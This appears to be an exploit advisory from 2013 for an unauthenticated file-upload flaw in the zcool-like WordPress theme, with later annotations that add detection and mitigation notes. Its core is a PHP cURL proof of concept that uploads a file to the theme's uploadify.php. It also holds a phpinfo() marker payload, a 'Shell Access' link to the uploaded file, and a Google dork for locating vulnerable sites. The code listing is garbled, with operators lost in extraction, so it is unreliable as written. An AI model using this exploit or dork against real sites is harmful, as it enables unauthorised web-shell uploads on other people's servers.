
WordPress Themes zcool like File Upload Vulnerability

Author: TrojanSpot , Published: 23-10-2013
############################################################################
# Title : Wordpress Themes zcool like File Upload Vulnerability
# Author : TrojanSpot
# Date : 23/10/2013
# Facebook => http://fb.me/AcehCyberTeams
# Vendor : N/a
# Google Dork => inurl:/wp-content/themes/zcool-like
# Tested on : Windows 7 , Mobile Windows Phone
############################################################################

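Exploit : uploadshell.php

The listing below posts a file part (Filedata) and a sender-chosen destination (folder) to the theme's uploadify.php. The request carries no login cookie or nonce, which suggests the endpoint stores uploads without authentication or file-type checks; the endpoint's own code is not shown on this page. Note that the listing uses the directory name zcool_like, while the search string above uses zcool-like.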

<?php
// Proof-of-concept request, reproduced as published. The listing lost its "=" and ","
// tokens when the page was extracted, so it does not parse as shown.
//
// What the request consists of: a POST to uploadify.php inside the theme directory with two
// fields, 'Filedata' (a file part) and 'folder' (a destination path supplied by the sender).
// No cookie, nonce or credential is set on the handle anywhere in this listing.
// NOTE(review): the server-side uploadify.php is not shown here; that it accepts the file
// without authentication or extension checks is implied by the advisory — confirm against
// the theme source.
//
// Detection: POST requests to /wp-content/themes/<theme>/uploadify.php in web access logs,
// and .php files appearing under wp-content/ outside normal plugin/theme installs.
// Mitigation: remove the bundled uploadify.php or gate it behind an authenticated session,
// a capability check and a nonce; allow-list extensions; ignore the client-supplied 'folder';
// deny PHP execution in directories that receive uploads.
 
$uploadfile
="act.php";
$ch curl_init("http://localhost/wordpress/wp-content/themes/zcool_like/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
// Passing an array as the POST fields makes cURL send multipart/form-data.
curl_setopt($chCURLOPT_POSTFIELDS,
              array(
'Filedata'=>"@$uploadfile",
              
'folder'=>'/wp-content/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
// The endpoint's response body is echoed back unchanged.
  print 
"$postResult";
?> 
<br>
<br>
<a href="http://localhost/wordpress/wp-content/sa.php" style="color: red;">Shell Access</a>
--------------------------------------------------------------------------------------
<?php
// Marker payload: the file does nothing except call phpinfo(). Seeing its output at the
// uploaded URL shows that the server executes PHP files written by the upload endpoint.
// The page does not label this listing; presumably it is the content of act.php — confirm.
// phpinfo() output exposes configuration and environment details, so a copy left on a
// production host is an information leak in its own right and should be removed.
phpinfo
();
?>

--------------------------------------------------------------------------------------

[#] Greeting ###################################################################################################################################################### #
./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./3vasteric-gt ./Aneuk Nanggroe ./Konoha ./mr.b4dm4sh ./SangYog ./Daiku dan Ban Mandum Saudara Lon Di Aceh Cyber Team #
################################################################################################################################################################
------------------------------ The End ------------------------------------------------------------------------------------------------------------
